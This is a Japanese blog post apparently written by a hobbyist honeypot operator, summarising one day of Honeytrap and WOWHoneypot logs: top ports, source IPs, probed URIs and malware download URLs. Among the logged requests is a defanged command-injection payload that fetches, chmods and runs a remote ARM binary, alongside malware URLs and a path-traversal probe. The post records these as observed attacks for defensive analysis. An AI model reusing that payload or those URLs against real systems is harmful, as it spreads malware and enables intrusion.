【ハニーポット簡易分析】Honeypot簡易分析(2020/01/10)
本当に久々の更新になってしました。ハニーポッター せっくちっくです。
Splunkのライセンス切れからずるずると解析が遅れてしまい、Splunkの調子が悪く、
結局ログから分析することにしました。
ただ、やるなら新しいことをやりたいなーと思ったので、新たなハニーポットを
立てることにしました。今回は低スペック(メモリ 512MB、SSD 25GB)で
以下のハニーポットを構築しています。
<構築したハニーポット>
・Hoenytrap
・WOWHoneypot(HTTP)
・WOWHoneypot(HTTPS)
また、今回はいくつか新しいことに挑戦しています。
・WOWHoneypotのHTTPS化対応
これまではHTTPS化には対応していませんでしたが、
HTTPSのトラフィックも対応できるようにしました。
・解析用のプログラム作成
ログファイルから解析できるようにPythonである程度自動化を試みました。
なるべく、解析に時間を使えるように作成しているのですが、
初回はデバック作業などで結局4時間ぐらいかかってしまいました。。。
・マルウェアの分析強化
Honeytrapではマルウェア感染を狙った通信を多数検知してましたが、
取得先のサーバがすぐに落ちてしまうため、なかなか分析できないケースが
ありました。ある程度自動的にマルウェアを分析できるようにしているため
前と比較して不明であるマルウェアが減る予定です(頑張って実装中)
・HoneytrapのDocker化
今まではHoneytrapはt-potで実装されているDockerのイメージをそのまま利用
していたため、コンフィグファイルなどの細かな設定は変更できませんでした。
今回は1からDockerファイルを作成しているため、設定変更が可能になりました。
と長くなりましたが、2019/01/10 の分析結果となります。
※Splunkと同等の解析結果にするにはちょっと時間がかかりそうです。
<Honeytrap>
Local Port Top 10
LocalPort Count
1433 430248 件
445 788 件
3389 110 件
995 84 件
52869 83 件
8080 75 件
81 63 件
139 57 件
Remote IP Top 10
RemoteIP Count
119[.]243[.]202[.]47 29911 件
164[.]100[.]146[.]178 29905 件
221[.]144[.]241[.]115 29904 件
153[.]19[.]11[.]3 29898 件
103[.]141[.]72[.]196 29892 件
153[.]150[.]56[.]210 29805 件
202[.]137[.]141[.]45 29617 件
190[.]37[.]215[.]5 26402 件
Malware Count
No Malware 435169 件
hxxp://switchnets[.]net/unstable 4 件
hxxp://cb[.]fuckingmy[.]life/download[.]exe 1 件
→Trojan.Win32.BLUEROH.RPA
→Trojan.Win32.BLUEROH.RPA
hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 1 件
<WOWHoneypot>
URI Path Top 10
URI Path Count
/ 27 件
/manager/html 16 件
/admin/assets/js/views/login[.]js 15 件
/admin/i18n/readme[.]txt 7 件
/recordings/theme/main[.]css 7 件
/admin/config[.]php 7 件
/robots[.]txt 3 件
Remote IP Top 10
RemoteIP Count
77[.]247[.]108[.]77 35 件
220[.]191[.]227[.]5 16 件
77[.]247[.]108[.]119 8 件
80[.]82[.]68[.]17 3 件
13[.]59[.]114[.]33 2 件
74[.]63[.]227[.]26 2 件
45[.]79[.]152[.]7 2 件
45[.]121[.]238[.]192 1 件
All URI
URI Count
/ 26 件
/manager/html 16 件
/admin/assets/js/views/login[.]js 15 件
/admin/i18n/readme[.]txt 7 件
/recordings/theme/main[.]css 7 件
/admin/config[.]php 7 件
/robots[.]txt 3 件
/card_scan_decoder[.]php?No=30&door=`wget hxxp://switchnets[.]net/hoho[.]arm7; chmod 777 hoho[.]arm7; [.]/hoho[.]arm7 linear` 2 件
ip[.]ws[.]126[.]net:443 1 件
/?XDEBUG_SESSION_START=phpstorm 1 件
hxxp://123[.]125[.]114[.]144/ 1 件
www[.]baidu[.]com:443 1 件
www[.]ipip[.]net:443 1 件
hxxp://www[.]123cha[.]com/ 1 件
cn[.]bing[.]com:443 1 件
/Word[.]dotm 1 件
<WOWHoneypot(HTTPS)>
URI Path Top 10
URI Path Count
/admin/assets/js/views/login[.]js 16 件
/admin/i18n/readme[.]txt 8 件
/recordings/theme/main[.]css 8 件
/admin/config[.]php 8 件
/ 5 件
/vpn/[.][.]/vpns/ 1 件
/robots[.]txt 1 件
Remote IP Top 10
RemoteIP Count
77[.]247[.]108[.]77 40 件
77[.]247[.]108[.]119 8 件
80[.]82[.]68[.]17 3 件
172[.]104[.]214[.]114 1 件
45[.]76[.]196[.]179 1 件
184[.]105[.]139[.]67 1 件
213[.]32[.]122[.]82 1 件
45[.]79[.]152[.]7 1 件
All URI
URI Count
/admin/assets/js/views/login[.]js 16 件
/admin/i18n/readme[.]txt 8 件
/recordings/theme/main[.]css 8 件
/admin/config[.]php 8 件
/ 5 件
/vpn/[.][.]/vpns/ 1 件
/robots[.]txt 1 件
